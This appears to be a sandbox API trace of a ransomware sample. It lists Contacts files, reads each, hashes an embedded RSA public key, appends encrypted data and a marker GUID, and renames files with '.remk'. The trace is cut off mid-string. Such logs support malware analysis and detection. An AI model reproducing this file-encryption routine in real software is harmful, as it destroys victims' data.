1 [0231.004] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0231.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0231.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0231.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0231.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0231.004] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0231.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.004] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.004] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.004] CloseHandle (hObject=0x640) returned 1 [0231.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b1b70 [0231.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0231.006] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.remk")) returned 1 [0231.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0231.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.007] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.009] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0231.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.009] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned=".ini" [0231.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0231.009] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0231.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.009] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned=".contact" [0231.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.011] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=1174) returned 1 [0231.011] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.013] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.013] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.031] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.032] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x496, lpOverlapped=0x0) returned 1 [0231.032] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.032] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.032] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.032] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0231.035] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.035] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.035] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.035] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.035] GetLastError () returned 0x0 [0231.035] SetLastError (dwErrCode=0x0) [0231.035] GetLastError () returned 0x0 [0231.035] SetLastError (dwErrCode=0x0) [0231.036] GetLastError () returned 0x0 [0231.036] SetLastError (dwErrCode=0x0) [0231.036] GetLastError () returned 0x0 [0231.036] SetLastError (dwErrCode=0x0) [0231.036] GetLastError () returned 0x0 [0231.036] SetLastError (dwErrCode=0x0) [0231.036] GetLastError () returned 0x0 [0231.036] SetLastError (dwErrCode=0x0) [0231.036] GetLastError () returned 0x0 [0231.036] SetLastError (dwErrCode=0x0) [0231.036] GetLastError () returned 0x0 [0231.036] SetLastError (dwErrCode=0x0) [0231.036] GetLastError () returned 0x0 [0231.036] SetLastError (dwErrCode=0x0) [0231.036] GetLastError () returned 0x0 [0231.036] SetLastError (dwErrCode=0x0) [0231.036] GetLastError () returned 0x0 [0231.036] SetLastError (dwErrCode=0x0) [0231.036] GetLastError () returned 0x0 [0231.036] SetLastError (dwErrCode=0x0) [0231.036] GetLastError () returned 0x0 [0231.036] SetLastError (dwErrCode=0x0) [0231.037] GetLastError () returned 0x0 [0231.037] SetLastError (dwErrCode=0x0) [0231.037] GetLastError () returned 0x0 [0231.037] SetLastError (dwErrCode=0x0) [0231.037] GetLastError () returned 0x0 [0231.037] SetLastError (dwErrCode=0x0) [0231.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.037] GetLastError () returned 0x0 [0231.037] SetLastError (dwErrCode=0x0) [0231.037] GetLastError () returned 0x0 [0231.037] SetLastError (dwErrCode=0x0) [0231.037] GetLastError () returned 0x0 [0231.037] SetLastError (dwErrCode=0x0) [0231.037] GetLastError () returned 0x0 [0231.037] SetLastError (dwErrCode=0x0) [0231.037] GetLastError () returned 0x0 [0231.037] SetLastError (dwErrCode=0x0) [0231.037] GetLastError () returned 0x0 [0231.037] SetLastError (dwErrCode=0x0) [0231.037] GetLastError () returned 0x0 [0231.037] SetLastError (dwErrCode=0x0) [0231.037] GetLastError () returned 0x0 [0231.038] SetLastError (dwErrCode=0x0) [0231.038] GetLastError () returned 0x0 [0231.038] SetLastError (dwErrCode=0x0) [0231.038] GetLastError () returned 0x0 [0231.038] SetLastError (dwErrCode=0x0) [0231.038] GetLastError () returned 0x0 [0231.038] SetLastError (dwErrCode=0x0) [0231.038] GetLastError () returned 0x0 [0231.038] SetLastError (dwErrCode=0x0) [0231.038] GetLastError () returned 0x0 [0231.038] SetLastError (dwErrCode=0x0) [0231.038] GetLastError () returned 0x0 [0231.038] SetLastError (dwErrCode=0x0) [0231.038] GetLastError () returned 0x0 [0231.038] SetLastError (dwErrCode=0x0) [0231.038] GetLastError () returned 0x0 [0231.038] SetLastError (dwErrCode=0x0) [0231.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0231.038] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.038] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0231.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.039] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.039] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.039] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4a0) returned 0x325fb40 [0231.039] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d6d0 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b74f0 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc38 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7538 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc80 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd10 [0231.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcc8 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc68 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x65dd10 [0231.040] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325d8d8 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b1b70 [0231.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0231.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc68 | out: hHeap=0x630000) returned 1 [0231.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcc8 | out: hHeap=0x630000) returned 1 [0231.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcc8 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edc68 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edd10 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0231.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc68 | out: hHeap=0x630000) returned 1 [0231.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0231.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcc8 | out: hHeap=0x630000) returned 1 [0231.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0231.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8d8 | out: hHeap=0x630000) returned 1 [0231.041] GetCurrentThreadId () returned 0x314 [0231.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696e68 [0231.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.041] GetCurrentThreadId () returned 0x314 [0231.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcc8 [0231.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.044] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x496, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.044] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.045] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.045] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.045] CloseHandle (hObject=0x640) returned 1 [0231.047] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.remk")) returned 1 [0231.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0231.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.050] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.052] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0231.052] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned=".contact" [0231.052] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.056] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=1172) returned 1 [0231.056] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.059] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x46e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.059] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.061] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x494, lpOverlapped=0x0) returned 1 [0231.061] lstrlenA (lpString="-----BEGIN PUBLIC 